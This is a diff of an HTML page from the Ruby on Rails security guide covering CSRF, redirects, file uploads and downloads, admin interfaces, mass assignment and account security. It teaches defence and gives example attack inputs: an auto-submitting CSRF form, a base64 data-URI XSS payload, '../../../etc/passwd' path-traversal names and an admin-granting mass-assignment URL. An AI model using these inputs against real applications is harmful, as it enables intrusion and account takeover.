          • -Bob doesn't notice the attack — but a few days later he finds out that project number one is gone. +Bob doesn’t notice the attack — but a few days later he finds out that project number one is gone.

          -

          It is important to notice that the actual crafted image or link doesn't necessarily have to be situated in the web application's domain, it can be anywhere – in a forum, blog post or email.

          -

          CSRF appears very rarely in CVE (Common Vulnerabilities and Exposures) — less than 0.1% in 2006 — but it really is a sleeping giant [Grossman]. This is in stark contrast to the results in my (and others) security contract work – CSRF is an important security issue.

          +

          It is important to notice that the actual crafted image or link doesn’t necessarily have to be situated in the web application’s domain, it can be anywhere – in a forum, blog post or email.

          +

          CSRF appears very rarely in CVE (Common Vulnerabilities and Exposures) — less than 0.1% in 2006 — but it really is a sleeping giant [Grossman]. This is in stark contrast to the results in my (and others) security contract work – CSRF is an important security issue.

          3.1. CSRF Countermeasures

          -

          First, as is required by the W3C, use GET and POST appropriately. Secondly, a security token in non-GET requests will protect your application from CSRF.

          -

          The HTTP protocol basically provides two main types of requests - GET and POST (and more, but they are not supported by most browsers). The World Wide Web Consortium (W3C) provides a checklist for choosing HTTP GET or POST:

          -

          Use GET if:

          -
            +

            -- First, as is required by the W3C, use GET and POST appropriately. Secondly, a security token in non-GET requests will protect your application from CSRF.

            +

            The HTTP protocol basically provides two main types of requests - GET and POST (and more, but they are not supported by most browsers). The World Wide Web Consortium (W3C) provides a checklist for choosing HTTP GET or POST:

            +

            Use GET if:

            +
            • The interaction is more like a question (i.e., it is a safe operation such as a query, read operation, or lookup).

            -

            Use POST if:

            -
              +

              Use POST if:

              +
              • The interaction is more like an order, or @@ -641,14 +637,14 @@ The user is held accountable for the re

              -

              If your web application is RESTful, you might be used to additional HTTP verbs, such as PUT or DELETE. Most of today‘s web browsers, however do not support them - only GET and POST. Rails uses a hidden _method field to handle this barrier.

              -

              The verify method in a controller can make sure that specific actions may not be used over GET. Here is an example to verify the use of the transfer action over POST. If the action comes in using any other verb, it redirects to the list action.

              +

              If your web application is RESTful, you might be used to additional HTTP verbs, such as PUT or DELETE. Most of today‘s web browsers, however do not support them - only GET and POST. Rails uses a hidden _method field to handle this barrier.

              +

              The verify method in a controller can make sure that specific actions may not be used over GET. Here is an example to verify the use of the transfer action over POST. If the action comes in using any other verb, it redirects to the list action.

              verify :method => :post, :only => [:transfer], :redirect_to => {:action => :list}
              -

              With this precaution, the attack from above will not work, because the browser sends a GET request for images, which will not be accepted by the web application.

              -

              But this was only the first step, because POST requests can be send automatically, too. Here is an example for a link which displays www.harmless.com as destination in the browser's status bar. In fact it dynamically creates a new form that sends a POST request.

              +

              With this precaution, the attack from above will not work, because the browser sends a GET request for images, which will not be accepted by the web application.

              +

              But this was only the first step, because POST requests can be send automatically, too. Here is an example for a link which displays www.harmless.com as destination in the browser’s status bar. In fact it dynamically creates a new form that sends a POST request.

              f.method = 'POST'; f.action = 'http://www.example.com/account/destroy'; f.submit(); - return false;">To the harmless survey</a> -
              -

              Or the attacker places the code into the onmouseover event handler of an image:

              -

              <img src="http://www.harmless.com/img" width="400" height="400" onmouseover="…" />

              -

              There are many other possibilities, including Ajax to attack the victim in the background.
The solution to this is including a security token in non-GET requests which check on the server-side. In Rails 2 or higher, this is a one-liner in the application controller:

              -

              protect_from_forgery :secret ⇒ "123456789012345678901234567890…"

              -

              This will automatically include a security token, calculated from the current session and the server-side secret, in all forms and Ajax requests generated by Rails. You won't need the secret, if you use CookieStorage as session storage. It will raise an ActionController::InvalidAuthenticityToken error, if the security token doesn't match what was expected.

              -

              Note that cross-site scripting (XSS) vulnerabilities bypass all CSRF protections. XSS gives the attacker access to all elements on a page, so he can read the CSRF security token from a form or directly submit the form. Read more about XSS later.

              + return false;">To the harmless survey</a>
          +

          Or the attacker places the code into the onmouseover event handler of an image:

          +

          <img src="http://www.harmless.com/img" width="400" height="400" onmouseover="..." />

          +

          There are many other possibilities, including Ajax to attack the victim in the background.
The solution to this is including a security token in non-GET requests which check on the server-side. In Rails 2 or higher, this is a one-liner in the application controller:

          +

          protect_from_forgery :secret => "123456789012345678901234567890..."

          +

          This will automatically include a security token, calculated from the current session and the server-side secret, in all forms and Ajax requests generated by Rails. You won’t need the secret, if you use CookieStorage as session storage. It will raise an ActionController::InvalidAuthenticityToken error, if the security token doesn’t match what was expected.

          +

          Note that cross-site scripting (XSS) vulnerabilities bypass all CSRF protections. XSS gives the attacker access to all elements on a page, so he can read the CSRF security token from a form or directly submit the form. Read more about XSS later.

        4. Redirection and Files

        -

        Another class of security vulnerabilities surrounds the use of redirection and files in web applications.

        +

        Another class of security vulnerabilities surrounds the use of redirection and files in web applications.

        4.1. Redirection

        -

        Redirection in a web application is an underestimated cracker tool: Not only can the attacker forward the user to a trap web site, he may also create a self-contained attack.

        -

        Whenever the user is allowed to pass (parts of) the URL for redirection, it is possibly vulnerable. The most obvious attack would be to redirect users to a fake web application which looks and feels exactly as the original one. This so-called phishing attack works by sending an unsuspicious link in an email to the users, injecting the link by XSS in the web application or putting the link into an external site. It is unsuspicious, because the link starts with the URL to the web application and the URL to the malicious site is hidden in the redirection parameter: http://www.example.com/site/redirect?to= www.attacker.com. Here is an example of a legacy action:

        +

        -- Redirection in a web application is an underestimated cracker tool: Not only can the attacker forward the user to a trap web site, he may also create a self-contained attack.

        +

        Whenever the user is allowed to pass (parts of) the URL for redirection, it is possibly vulnerable. The most obvious attack would be to redirect users to a fake web application which looks and feels exactly as the original one. This so-called phishing attack works by sending an unsuspicious link in an email to the users, injecting the link by XSS in the web application or putting the link into an external site. It is unsuspicious, because the link starts with the URL to the web application and the URL to the malicious site is hidden in the redirection parameter: http://www.example.com/site/redirect?to= www.attacker.com. Here is an example of a legacy action:

        def legacy
           redirect_to(params.update(:action=>'main'))
        -end
        -
        -

        This will redirect the user to the main action if he tried to access a legacy action. The intention was to preserve the URL parameters to the legacy action and pass them to the main action. However, it can exploited by an attacker if he includes a host key in the URL:

        -

        http://www.example.com/site/legacy?param1=xy&param2=23&host=www.attacker.com

        -

        If it is at the end of the URL it will hardly be noticed and redirects the user to the attacker.com host. A simple countermeasure would be to include only the expected parameters in a legacy action (again a whitelist approach, as opposed to removing unexpected parameters). And if you redirect to an URL, check it with a whitelist or a regular expression.

        +end
        +

        This will redirect the user to the main action if he tried to access a legacy action. The intention was to preserve the URL parameters to the legacy action and pass them to the main action. However, it can exploited by an attacker if he includes a host key in the URL:

        +

        http://www.example.com/site/legacy?param1=xy&param2=23&host=www.attacker.com

        +

        If it is at the end of the URL it will hardly be noticed and redirects the user to the attacker.com host. A simple countermeasure would be to include only the expected parameters in a legacy action (again a whitelist approach, as opposed to removing unexpected parameters). And if you redirect to an URL, check it with a whitelist or a regular expression.

        4.1.1. Self-contained XSS

        -

        Another redirection and self-contained XSS attack works in Firefox and Opera by the use of the data protocol. This protocol displays its contents directly in the browser and can be anything from HTML or JavaScript to entire images:

        -

        data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K

        -

        This example is a Base64 encoded JavaScript which displays a simple message box. In a redirection URL, an attacker could redirect to this URL with the malicious code in it. As a countermeasure, do not allow the user to supply (parts of) the URL to be redirected to.

        +

        Another redirection and self-contained XSS attack works in Firefox and Opera by the use of the data protocol. This protocol displays its contents directly in the browser and can be anything from HTML or JavaScript to entire images:

        +

        data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K

        +

        This example is a Base64 encoded JavaScript which displays a simple message box. In a redirection URL, an attacker could redirect to this URL with the malicious code in it. As a countermeasure, do not allow the user to supply (parts of) the URL to be redirected to.

        4.2. File uploads

        -

        Make sure file uploads don't overwrite important files, and process media files asynchronously.

        -

        Many web applications allow users to upload files. File names, which the user may choose (partly), should always be filtered as an attacker could use a malicious file name to overwrite any file on the server. If you store file uploads at /var/www/uploads, and the user enters a file name like “../../../etc/passwd”, it may overwrite an important file. Of course, the Ruby interpreter would need the appropriate permissions to do so – one more reason to run web servers, database servers and other programs as a less privileged Unix user.

        -

        When filtering user input file names, don't try to remove malicious parts. Think of a situation where the web application removes all “../” in a file name and an attacker uses a string such as “….//” - the result will be “../”. It is best to use a whitelist approach, which checks for the validity of a file name with a set of accepted characters. This is opposed to a blacklist approach which attempts to remove not allowed characters. In case it isn't a valid file name, reject it (or replace not accepted characters), but don't remove them. Here is the file name sanitizer from the attachment_fu plugin:

        +

        -- Make sure file uploads don’t overwrite important files, and process media files asynchronously.

        +

        Many web applications allow users to upload files. File names, which the user may choose (partly), should always be filtered as an attacker could use a malicious file name to overwrite any file on the server. If you store file uploads at /var/www/uploads, and the user enters a file name like “../../../etc/passwd”, it may overwrite an important file. Of course, the Ruby interpreter would need the appropriate permissions to do so – one more reason to run web servers, database servers and other programs as a less privileged Unix user.

        +

        When filtering user input file names, don’t try to remove malicious parts. Think of a situation where the web application removes all “../” in a file name and an attacker uses a string such as “....//” - the result will be “../”. It is best to use a whitelist approach, which checks for the validity of a file name with a set of accepted characters. This is opposed to a blacklist approach which attempts to remove not allowed characters. In case it isn’t a valid file name, reject it (or replace not accepted characters), but don’t remove them. Here is the file name sanitizer from the attachment_fu plugin:

        # or periods with underscore name.gsub! /[^\w\.\-]/, '_' end -end -
        -

        A significant disadvantage of synchronous processing of file uploads (as the attachment_fu plugin may do with images), is its vulnerability to denial-of-service attacks. An attacker can synchronously start image file uploads from many computers which increases the server load and may eventually crash or stall the server.

        -

        The solution to this, is best to process media files asynchronously: Save the media file and schedule a processing request in the database. A second process will handle the processing of the file in the background.

        +end
      +

      A significant disadvantage of synchronous processing of file uploads (as the attachment_fu plugin may do with images), is its vulnerability to denial-of-service attacks. An attacker can synchronously start image file uploads from many computers which increases the server load and may eventually crash or stall the server.

      +

      The solution to this, is best to process media files asynchronously: Save the media file and schedule a processing request in the database. A second process will handle the processing of the file in the background.

      4.3. Executable code in file uploads

      -

      Source code in uploaded files may be executed when placed in specific directories. Do not place file uploads in Rails /public directory if it is Apache's home directory.

      -

      The popular Apache web server has an option called DocumentRoot. This is the home directory of the web site, everything in this directory tree will be served by the web server. If there are files with a certain file name extension, the code in it will be executed when requested (might require some options to be set). Examples for this are PHP and CGI files. Now think of a situation where an attacker uploads a file “file.cgi” with code in it, which will be executed when someone downloads the file.

      -

      If your Apache DocumentRoot points to Rails' /public directory, do not put file uploads in it, store files at least one level downwards.

      +

      -- Source code in uploaded files may be executed when placed in specific directories. Do not place file uploads in Rails /public directory if it is Apache’s home directory.

      +

      The popular Apache web server has an option called DocumentRoot. This is the home directory of the web site, everything in this directory tree will be served by the web server. If there are files with a certain file name extension, the code in it will be executed when requested (might require some options to be set). Examples for this are PHP and CGI files. Now think of a situation where an attacker uploads a file “file.cgi” with code in it, which will be executed when someone downloads the file.

      +

      If your Apache DocumentRoot points to Rails' /public directory, do not put file uploads in it, store files at least one level downwards.

      4.4. File downloads

      -

      Make sure users cannot download arbitrary files.

      -

      Just as you have to filter file names for uploads, you have to do so for downloads. The send_file() method sends files from the server to the client. If you use a file name, that the user entered, without filtering, any file can be downloaded:

      +

      -- Make sure users cannot download arbitrary files.

      +

      Just as you have to filter file names for uploads, you have to do so for downloads. The send_file() method sends files from the server to the client. If you use a file name, that the user entered, without filtering, any file can be downloaded:

      -
      send_file('/var/www/uploads/' + params[:filename])
      -
      -

      Simply pass a file name like “../../../etc/passwd” to download the server's login information. A simple solution against this, is to check that the requested file is in the expected directory:

      +
      send_file('/var/www/uploads/' + params[:filename])
    +

    Simply pass a file name like “../../../etc/passwd” to download the server’s login information. A simple solution against this, is to check that the requested file is in the expected directory:

    filename = File.expand_path(File.join(basename, @file.public_filename)) raise if basename =! File.expand_path(File.join(File.dirname(filename), '../../../')) -send_file filename, :disposition => 'inline' -
    -

    Another (additional) approach is to store the file names in the database and name the files on the disk after the ids in the database. This is also a good approach to avoid possible code in an uploaded file to be executed. The attachment_fu plugin does this in a similar way.

    +send_file filename, :disposition => 'inline' +

    Another (additional) approach is to store the file names in the database and name the files on the disk after the ids in the database. This is also a good approach to avoid possible code in an uploaded file to be executed. The attachment_fu plugin does this in a similar way.

    5. Intranet and Admin security

    -

    Intranet and administration interfaces are popular attack targets, because they allow privileged access. Although this would require several extra-security measures, the opposite is the case in the real world.

    -

    In 2007 there was the first tailor-made Trojan which stole information from an Intranet, namely the "Monster for employers" web site of Monster.com, an online recruitment web application. Tailor-made Trojans are very rare, so far, and the risk is quite low, but it is certainly a possibility and an example of how the security of the client host is important, too. However, the highest threat to Intranet and Admin applications are XSS and CSRF.


    -

    XSS If your application re-displays malicious user input from the extranet, the application will be vulnerable to XSS. User names, comments, spam reports, order addresses are just a few uncommon examples, where there can be XSS.

    -

    Having one single place in the admin interface or Intranet where the input has not been sanitized, makes the entire application vulnerable. Possible exploits include stealing the privileged administrator's cookie, injecting an iframe to steal the administrator's password or installing malicious software through browser security holes to take over the administrator's computer.

    -

    Refer to the Injection section for countermeasures against XSS. It is recommended to use the SafeErb plugin also in an Intranet or administration interface.

    -

    CSRF Cross-Site Reference Forgery (CSRF) is a giant attack method, it allows the attacker to do everything the administrator or Intranet user may do. As you have already seen above how CSRF works, here are a few examples of what attackers can do in the Intranet or admin interface.

    -

    A real-world example is a router reconfiguration by CSRF. The attackers sent a malicious e-mail, with CSRF in it, to Mexican users. The e-mail claimed there was an e-card waiting for them, but it also contained an image tag that resulted in a HTTP-GET request to reconfigure the user's router (which is a popular model in Mexico). The request changed the DNS-settings so that requests to a Mexico-based banking site would be mapped to the attacker's site. Everyone who accessed the banking site through that router saw the attacker's fake web site and had his credentials stolen.

    -

    Another example changed Google Adsense's e-mail address and password by CSRF. If the victim was logged into Google Adsense, the administration interface for Google advertisements campaigns, an attacker could change his credentials.


    -

    Another popular attack is to spam your web application, your blog or forum to propagate malicious XSS. Of course, the attacker has to know the URL structure, but most Rails URLs are quite straightforward or they will be easy to find out, if it is an open-source application's admin interface. The attacker may even do 1,000 lucky guesses by just including malicious IMG-tags which try every possible combination.

    -

    For countermeasures against CSRF in administration interfaces and Intranet applications, refer to the countermeasures in the CSRF section.

    +

    -- Intranet and administration interfaces are popular attack targets, because they allow privileged access. Although this would require several extra-security measures, the opposite is the case in the real world.

    +

    In 2007 there was the first tailor-made Trojan which stole information from an Intranet, namely the "Monster for employers" web site of Monster.com, an online recruitment web application. Tailor-made Trojans are very rare, so far, and the risk is quite low, but it is certainly a possibility and an example of how the security of the client host is important, too. However, the highest threat to Intranet and Admin applications are XSS and CSRF.


    +

    XSS If your application re-displays malicious user input from the extranet, the application will be vulnerable to XSS. User names, comments, spam reports, order addresses are just a few uncommon examples, where there can be XSS.

    +

    Having one single place in the admin interface or Intranet where the input has not been sanitized, makes the entire application vulnerable. Possible exploits include stealing the privileged administrator’s cookie, injecting an iframe to steal the administrator’s password or installing malicious software through browser security holes to take over the administrator’s computer.

    +

    Refer to the Injection section for countermeasures against XSS. It is recommended to use the SafeErb plugin also in an Intranet or administration interface.

    +

    CSRF Cross-Site Reference Forgery (CSRF) is a giant attack method, it allows the attacker to do everything the administrator or Intranet user may do. As you have already seen above how CSRF works, here are a few examples of what attackers can do in the Intranet or admin interface.

    +

    A real-world example is a router reconfiguration by CSRF. The attackers sent a malicious e-mail, with CSRF in it, to Mexican users. The e-mail claimed there was an e-card waiting for them, but it also contained an image tag that resulted in a HTTP-GET request to reconfigure the user’s router (which is a popular model in Mexico). The request changed the DNS-settings so that requests to a Mexico-based banking site would be mapped to the attacker’s site. Everyone who accessed the banking site through that router saw the attacker’s fake web site and had his credentials stolen.

    +

    Another example changed Google Adsense’s e-mail address and password by CSRF. If the victim was logged into Google Adsense, the administration interface for Google advertisements campaigns, an attacker could change his credentials.


    +

    Another popular attack is to spam your web application, your blog or forum to propagate malicious XSS. Of course, the attacker has to know the URL structure, but most Rails URLs are quite straightforward or they will be easy to find out, if it is an open-source application’s admin interface. The attacker may even do 1,000 lucky guesses by just including malicious IMG-tags which try every possible combination.

    +

    For countermeasures against CSRF in administration interfaces and Intranet applications, refer to the countermeasures in the CSRF section.

    5.1. Additional precautions

    -

    The common admin interface works like this: it's located at www.example.com/admin, may be accessed only if the admin flag is set in the User model, re-displays user input and allows the admin to delete/add/edit whatever data desired. Here are some thoughts about this:

    -
      +

      The common admin interface works like this: it’s located at www.example.com/admin, may be accessed only if the admin flag is set in the User model, re-displays user input and allows the admin to delete/add/edit whatever data desired. Here are some thoughts about this:

      +
      • It is very important to think about the worst case: What if someone really got hold of my cookie or user credentials. You could introduce roles for the admin interface to limit the possibilities of the attacker. Or how about special login credentials for the admin interface, other than the ones used for the public part of the application. Or a special password for very serious actions? @@ -764,7 +755,7 @@ It is very important to think about the

      • -Does the admin really have to access the interface from everywhere in the world? Think about limiting the login to a bunch of source IP addresses. Examine request.remote_ip to find out about the user's IP address. This is not bullet-proof, but a great barrier. Remember that there might be a proxy in use, though. +Does the admin really have to access the interface from everywhere in the world? Think about limiting the login to a bunch of source IP addresses. Examine request.remote_ip to find out about the user’s IP address. This is not bullet-proof, but a great barrier. Remember that there might be a proxy in use, though.

      • @@ -776,8 +767,8 @@ Does the admin really have to access the interface from everywhere in the world?

      6. Mass assignment

      -

      Without any precautions Model.new(params[:model]) allows attackers to set any database column's value.

      -

      The mass-assignment feature may become a problem, as it allows an attacker to set any model's attribute by manipulating the hash passed to a model's new() method:

      +

      -- Without any precautions Model.new(params[:model]) allows attackers to set any database column’s value.

      +

      The mass-assignment feature may become a problem, as it allows an attacker to set any model’s attribute by manipulating the hash passed to a model’s new() method:

      def signup
         params[:user] #=> {:name => “ow3ned”, :admin => true}
         @user = User.new(params[:user])
      -end
      -
      -

      Mass-assignment saves you much work, because you don't have to set each value individually. Simply pass a hash to the new() method, or assign attributes=(attributes) a hash value, to set the model's attributes to the values in the hash. The problem is that it is often used in conjunction with the parameters (params) hash available in the controller, which may be manipulated by an attacker. He may do so by changing the URL like this:

      +end
    +

    Mass-assignment saves you much work, because you don’t have to set each value individually. Simply pass a hash to the new() method, or assign attributes=(attributes) a hash value, to set the model’s attributes to the values in the hash. The problem is that it is often used in conjunction with the parameters (params) hash available in the controller, which may be manipulated by an attacker. He may do so by changing the URL like this:

    http://www.example.com/user/signup?user[name]=ow3ned&user[admin]=1
    -

    This will set the following parameters in the controller:

    +

    This will set the following parameters in the controller:

    -
    params[:user] #=> {:name => “ow3ned”, :admin => true}
    -
    -

    So if you create a new user using mass-assignment, it may be too easy to become an administrator.

    +
    params[:user] #=> {:name => “ow3ned”, :admin => true}
    +

    So if you create a new user using mass-assignment, it may be too easy to become an administrator.

    6.1. Countermeasures

    -

    To avoid this, Rails provides two class methods in your ActiveRecord class to control access to your attributes. The attr_protected method takes a list of attributes that will not be accessible for mass-assignment. For example:

    +

    To avoid this, Rails provides two class methods in your ActiveRecord class to control access to your attributes. The attr_protected method takes a list of attributes that will not be accessible for mass-assignment. For example:

    -
    attr_protected :admin
    -
    -

    A much better way, because it follows the whitelist-principle, is the attr_accessible method. It is the exact opposite of attr_protected, because it takes a list of attributes that will be accessible. All other attributes will be protected. This way you won't forget to protect attributes when adding new ones in the course of development. Here is an example:

    +
    attr_protected :admin
    +

    A much better way, because it follows the whitelist-principle, is the attr_accessible method. It is the exact opposite of attr_protected, because it takes a list of attributes that will be accessible. All other attributes will be protected. This way you won’t forget to protect attributes when adding new ones in the course of development. Here is an example:

    -
    attr_accessible :name
    -
    -

    If you want to set a protected attribute, you will to have to assign it individually:

    +
    attr_accessible :name
    +

    If you want to set a protected attribute, you will to have to assign it individually:

    @user = User.new(params[:user]) @user.admin #=> false # not mass-assigned @user.admin = true -@user.admin #=> true -
    +@user.admin #=> true

    7. User management

    -

    Almost every web application has to deal with authorization and authentication. Instead of rolling your own, it is advisable to use common plug-ins. But keep them up-to-date, too. A few additional precautions can make your application even more secure.

    -

    There are some authorization and authentication plug-ins for Rails available. A good one saves only encrypted passwords, not plain-text passwords. The most popular plug-in is restful_authentication which protects from session fixation, too. However, earlier versions allowed you to login without user name and password in certain circumstances.

    -

    Every new user gets an activation code to activate his account when he gets an e-mail with a link in it. After activating the account, the activation_code columns will be set to NULL in the database. If someone requested an URL like these, he would be logged in as the first activated user found in the database (and chances are that this is the administrator):

    +

    -- Almost every web application has to deal with authorization and authentication. Instead of rolling your own, it is advisable to use common plug-ins. But keep them up-to-date, too. A few additional precautions can make your application even more secure.

    +

    There are some authorization and authentication plug-ins for Rails available. A good one saves only encrypted passwords, not plain-text passwords. The most popular plug-in is restful_authentication which protects from session fixation, too. However, earlier versions allowed you to login without user name and password in certain circumstances.

    +

    Every new user gets an activation code to activate his account when he gets an e-mail with a link in it. After activating the account, the activation_code columns will be set to NULL in the database. If someone requested an URL like these, he would be logged in as the first activated user found in the database (and chances are that this is the administrator):

    http://localhost:3006/user/activate
     http://localhost:3006/user/activate?id=
    -

    This is possible because on some servers, this way the parameter id, as in params[:id], would be nil. However, here is the finder from the activation action:

    +

    This is possible because on some servers, this way the parameter id, as in params[:id], would be nil. However, here is the finder from the activation action:

    -
    User.find_by_activation_code(params[:id])
    -
    -

    If the parameter was nil, the resulting SQL query will be

    +
    User.find_by_activation_code(params[:id])
    +

    If the parameter was nil, the resulting SQL query will be

    SELECT * FROM users WHERE (users.`activation_code` IS NULL) LIMIT 1
    -

    And thus it found the first user in the database, returned it and logged him in. You can find out more about it in my blog post. It is advisable to update your plug-ins from time to time. Moreover, you can review your application to find more flaws like this.

    +

    And thus it found the first user in the database, returned it and logged him in. You can find out more about it in my blog post. It is advisable to update your plug-ins from time to time. Moreover, you can review your application to find more flaws like this.

    7.1. Brute-forcing accounts

    -

    Brute-force attacks on accounts are trial and error attacks on the login credentials. Fend them off with more generic error messages and possibly require to enter a CAPTCHA.

    -

    A list of user names for your web application may be misused to brute-force the corresponding passwords, because most people don't use sophisticated passwords. Most passwords are a combination of dictionary words and possibly numbers. So armed with a list of user name's and a dictionary, an automatic program may find the correct password in a matter of minutes.

    -

    Because of this, most web applications will display a generic error message “user name or password not correct”, if one of these are not correct. If it said “the user name you entered has not been found”, an attacker could automatically compile a list of user names.

    -

    However, what most web application designers neglect, are the forgot-password pages. These pages often admit that the entered user name or e-mail address has (not) been found. This allows an attacker to compile a list of user names and brute-force the accounts.

    -

    In order to mitigate such attacks, display a generic error message on forgot-password pages, too. Moreover, you can require to enter a CAPTCHA after a number of failed logins from a certain IP address. Note, however, that this is not a bullet-proof solution against automatic programs, because these programs may change their IP address exactly as often. However, it raises the barrier of an attack.

    +

    -- Brute-force attacks on accounts are trial and error attacks on the login credentials. Fend them off with more generic error messages and possibly require to enter a CAPTCHA.

    +

    A list of user names for your web application may be misused to brute-force the corresponding passwords, because most people don’t use sophisticated passwords. Most passwords are a combination of dictionary words and possibly numbers. So armed with a list of user name’s and a dictionary, an automatic program may find the correct password in a matter of minutes.

    +

    Because of this, most web applications will display a generic error message “user name or password not correct”, if one of these are not correct. If it said “the user name you entered has not been found”, an attacker could automatically compile a list of user names.

    +

    However, what most web application designers neglect, are the forgot-password pages. These pages often admit that the entered user name or e-mail address has (not) been found. This allows an attacker to compile a list of user names and brute-force the accounts.

    +

    In order to mitigate such attacks, display a generic error message on forgot-password pages, too. Moreover, you can require to enter a CAPTCHA after a number of failed logins from a certain IP address. Note, however, that this is not a bullet-proof solution against automatic programs, because these programs may change their IP address exactly as often. However, it raises the barrier of an attack.

    7.2. Account hijacking

    -

    Many web applications make it easy to hijack user accounts. Why not be different and make it more difficult?

    +

    -- Many web applications make it easy to hijack user accounts. Why not be different and make it more difficult?

    7.2.1. Passwords

    -

    Think of a situation where an attacker has stolen a user's session cookie and thus may co-use the application. If it is easy to change the password, the attacker will hijack the account with a few clicks. Or if the change-password form is vulnerable to CSRF, the attacker will be able to change the victim's password by luring him to a web page where there is a crafted IMG-tag which does the CSRF. As a countermeasure, make change-password forms safe against CSRF, of course. And require the user to enter the old password when changing it.

    +

    Think of a situation where an attacker has stolen a user’s session cookie and thus may co-use the application. If it is easy to change the password, the attacker will hijack the account with a few clicks. Or if the change-password form is vulnerable to CSRF, the attacker will be able to change the victim’s password by luring him to a web page where there is a crafted IMG-tag which does the CSRF. As a countermeasure, make change-password forms safe against CSRF, of course. And require the user to enter the old password when changing it.

    7.2.2. E-Mail

    -

    However, the attacker may also take over the account by changing the e-mail address. After he changed it, he will go to the forgotten-password page and the (possibly new) password will be mailed to the attacker's e-mail address. As a countermeasure require the user to enter the password when changing the e-mail address, too.

    +

    However, the attacker may also take over the account by changing the e-mail address. After he changed it, he will go to the forgotten-password page and the (possibly new) password will be mailed to the attacker’s e-mail address. As a countermeasure require the user to enter the password when changing the e-mail address, too.

    7.2.3. Other

    -

    Depending on your web application, there may be more ways to hijack the user's account. In many cases CSRF and XSS will help to do so. For example, as in a CSRF vulnerability in Google Mail. In this proof-of-concept attack, the victim would have been lured to a web site controlled by the attacker. On that site is a crafted IMG-tag which results in a HTTP GET request that changes the filter settings of Google Mail. If the victim was logged in to Google Mail, the attacker would change the filters to forward all e-mails to his e-mail address. This is nearly as harmful as hijacking the entire account. As a countermeasure, review your application logic and eliminate all XSS and CSRF vulnerabilities.

    +

    Depending on your web application, there may be more ways to hijack the user’s account. In many cases CSRF and XSS will help to do so. For example, as in a CSRF vulnerability in Google Mail. In this proof-of-concept attack, the victim would have been lured to a web site controlled by the attacker. On that site is a crafted IMG-tag which results in a HTTP GET request that changes the filter settings of Google Mail. If the victim was logged in to Google Mail, the attacker would change the filters to forward all e-mails to his e-mail address. This is nearly as harmful as hijacking the entire account. As a countermeasure, review your application logic and eliminate all XSS and CSRF vulnerabilities.

    7.3. CAPTCHAs

    -

    A CAPTCHA is a challenge-response test to determine that the response is not generated by a computer. It is often used to protect comment forms from automatic spam bots by asking the user to type the letters of a distorted image. The idea of a negative CAPTCHA is not to ask a user to proof that he is human, but reveal that a robot is a robot.

    -

    But not only spam robots (bots) are a problem, but also automatic login bots. A popular CAPTCHA API is reCAPTCHA which displays two distorted images of words from old books. It also adds an angled line, rather than a distorted background and high levels of warping on the text as earlier CAPTCHAs did, because the latter were broken. As a bonus, using reCAPTCHA helps to digitize old books. ReCAPTCHA is also a Rails plug-in with the same name as the API.

    -

    You will get two keys from the API, a public and a private key, which you have to put into your Rails environment. After that you can use the recaptcha_tags method in the view, and the verify_recaptcha method in the controller. Verify_recaptcha will return false if the validation fails. +

    -- A CAPTCHA is a challenge-response test to determine that the response is not generated by a computer. It is often used to protect comment forms from automatic spam bots by asking the user to type the letters of a distorted image. The idea of a negative CAPTCHA is not to ask a user to proof that he is human, but reveal that a robot is a robot.

    +

    But not only spam robots (bots) are a problem, but also automatic login bots. A popular CAPTCHA API is reCAPTCHA which displays two distorted images of words from old books. It also adds an angled line, rather than a distorted background and high levels of warping on the text as earlier CAPTCHAs did, because the latter were broken. As a bonus, using reCAPTCHA helps to digitize old books. ReCAPTCHA is also a Rails plug-in with the same name as the API.

    +

    You will get two keys from the API, a public and a private key, which you have to put into your Rails environment. After that you can use the recaptcha_tags method in the view, and the verify_recaptcha method in the controller. Verify_recaptcha will return false if the validation fails. The problem with CAPTCHAs is, they are annoying. Additionally, some visually impaired users have found certain kinds of distorted CAPTCHAs difficult to read. The idea of negative CAPTCHAs is not to ask a user to proof that he is human, but reveal that a spam robot is a bot.

    -

    Most bots are really dumb, they crawl the web and put their spam into every form's field they can find. Negative CAPTCHAs take advantage of that and include a "honeypot" field in the form which will be hidden from the human user by CSS or JavaScript.

    -

    Here are some ideas how to hide honeypot fields by JavaScript and/or CSS:

    -
      +

      Most bots are really dumb, they crawl the web and put their spam into every form’s field they can find. Negative CAPTCHAs take advantage of that and include a "honeypot" field in the form which will be hidden from the human user by CSS or JavaScript.

      +

      Here are some ideas how to hide honeypot fields by JavaScript and/or CSS:

      +
      • position the fields off of the visible area of the page @@ -894,9 +879,9 @@ leave the fields displayed, but tell humans to leave them blank

      -

      The most simple negative CAPTCHA is one hidden honeypot field. On the server side, you will check the value of the field: If it contains any text, it must be a bot. Then, you can either ignore the post or return a positive result, but not saving the post to the database. This way the bot will be satisfied and moves on. You can do this with annoying users, too.

      -

      You can find more sophisticated negative CAPTCHAs in Ned Batchelder's blog post:

      -
        +

        The most simple negative CAPTCHA is one hidden honeypot field. On the server side, you will check the value of the field: If it contains any text, it must be a bot. Then, you can either ignore the post or return a positive result, but not saving the post to the database. This way the bot will be satisfied and moves on. You can do this with annoying users, too.

        +

        You can find more sophisticated negative CAPTCHAs in Ned Batchelder’s blog post:

        +
        • Include a field with the current UTC time-stamp in it and check it on the server. If it is too far in the past, or if it is in the future, the form is invalid. @@ -913,26 +898,25 @@ Include more than one honeypot field of all types, including submission buttons

        -

        Note that this protects you only from automatic bots, targeted tailor-made bots cannot be stopped by this. So negative CAPTCHAs might not be good to protect login forms.

        +

        Note that this protects you only from automatic bots, targeted tailor-made bots cannot be stopped by this. So negative CAPTCHAs might not be good to protect login forms.

        7.4. Logging

        -

        Tell Rails not to put passwords in the log files.

        -

        By default, Rails logs all requests being made to the web application. But log files can be a huge security issue, as they may contain login credentials, credit card numbers etcetera. When designing a web application security concept, you should also think about what will happen if an attacker got (full) access to the web server. Encrypting secrets and passwords in the database will be quite useless, if the log files list them in clear text. You can filter certain request parameters from your log files by the filter_parameter_logging method in a controller. These parameters will be marked [FILTERED] in the log.

        +

        -- Tell Rails not to put passwords in the log files.

        +

        By default, Rails logs all requests being made to the web application. But log files can be a huge security issue, as they may contain login credentials, credit card numbers etcetera. When designing a web application security concept, you should also think about what will happen if an attacker got (full) access to the web server. Encrypting secrets and passwords in the database will be quite useless, if the log files list them in clear text. You can filter certain request parameters from your log files by the filter_parameter_logging method in a controller. These parameters will be marked [FILTERED] in the log.

        -
        filter_parameter_logging :password
        -
        +
        filter_parameter_logging :password

    7.5. Good passwords

    -

